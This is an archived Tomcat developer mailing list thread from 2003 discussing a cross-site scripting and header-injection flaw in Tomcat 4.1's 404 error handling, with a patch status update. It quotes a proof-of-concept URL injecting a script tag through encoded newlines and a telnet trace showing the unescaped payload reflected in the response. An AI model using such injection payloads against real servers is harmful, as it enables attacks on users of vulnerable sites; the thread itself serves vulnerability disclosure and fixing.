tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Bill Barker" <wbar...@wilshire.com>
Subject Re: Jakarta Tomcat 4.1 XSS vulnerability
Date Mon, 29 Sep 2003 19:32:32 GMT
Remy has already patched the HTTP Connector for this one (both Tomcat 4&5).
I believe that the patch still needs to be ported to the JK2 Connector.


----- Original Message -----
From: "Shapira, Yoav" <Yoav.Shapira@mpi.com>
To: "Tomcat Developers List" <tomcat-dev@jakarta.apache.org>
Sent: Monday, September 29, 2003 11:57 AM
Subject: RE: Jakarta Tomcat 4.1 XSS vulnerability



Howdy,
I'm not a big security buff, but three things come to mind:
- The original post with the "exploit" is more than a year old, yet we
haven't heard anything about this actually used maliciously -- how come?
- Is it really a vulnerability?  What can you get from this "exploit"?
All I see is tomcat returning a 404 (not found) response with the
javascript specified in the GET request, but javascript is executed on
the client anyhow, so who cares?
- What would the fix be?  Not include the requested URL in the default
404 response page?

Yoav Shapira
Millennium ChemInformatics


>-----Original Message-----
>From: David Rees [mailto:dbr@greenhydrant.com]
>Sent: Monday, September 29, 2003 2:41 PM
>To: Tomcat Developers List
>Subject: Re: Jakarta Tomcat 4.1 XSS vulnerability
>
>Anyone know how serious this is?
>
>It also appears to affect Tomcat 4.1.27 when using mod_jk as well.
Below
>is a sample trace of a HTTP session.
>
>-Dave
>
>> telnet localhost 8080
>Trying 127.0.0.1...
>Connected to localhost.
>Escape character is '^]'.
>GET /666%0a%0a<script>alert("asdf");</script>666.jsp HTTP/1.0
>Host: localhost
>
>HTTP/1.1 404 /666
>
><script>alert("asdf");</script>666.jsp
>Content-Type: text/html;charset=ISO-8859-1
>Content-Language: en-US
>Date: Mon, 29 Sep 2003 18:39:23 GMT
>Server: Apache Coyote/1.0
>Connection: close
>
><html><head><title>Apache Tomcat/4.1.27 - Error
>report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color
:
>white;background-color : #0086b2;} H3{font-family :
>sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;}
>BODY{font-family : sans-serif,Arial,Tahoma;color :
black;background-color
>: white;} B{color : white;background-color : #0086b2;} HR{color :
>#0086b2;} --></STYLE> </head><body><h1>HTTP Status 404 - /666
>
>&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp</h1><HR
>size="1" noshade><p><b>type</b> Status report</p><p><b>message</b>
<u>/666
>
>&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp</u></p><p>
<b>d
>escription</b>
><u>The requested resource (/666
>
>&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp)
is not
>available.</u></p><HR size="1" noshade><h3>Apache
>Tomcat/4.1.27</h3></body></html>Connection closed by foreign host.
>
>On Sun, September 28, 2003 at 3:14 am, Kan Ogawa sent the following
>>
>> Jakarta Tomcat 4.1 cross-site scripting vulnerability, which was
>> reported last year, is not yet resolved.
>>
>>
http://www.securityfocus.com/archive/82/288502/2002-08-16/2002-08-22/0
>>
>> I verified this vulnerability on Tomcat 4.1.27 with Coyote HTTP/1.1
>> connector.
>>
>> http://localhost:8080/666%0a%0a<script>alert("asdf");</script>666.jsp
>>
>> On the other hand, on Tomcat 5.0, it was not reproduced.
>> Do you neglect to resolve it to Tomcat 4.x, Tomcat committers?
>>
>> Regards,
>>
>> --
>> Kan Ogawa
>> super-creek@jcom.home.ne.jp
>
>
>---------------------------------------------------------------------
>To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org
>For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org




This e-mail, including any attachments, is a confidential business
communication, and may contain information that is confidential, proprietary
and/or privileged.  This e-mail is intended only for the individual(s) to
whom it is addressed, and may not be saved, copied, printed, disclosed or
used by anyone else.  If you are not the(an) intended recipient, please
immediately delete this e-mail from your computer system and notify the
sender.  Thank you.


---------------------------------------------------------------------
To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org
For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org



Mime
View raw message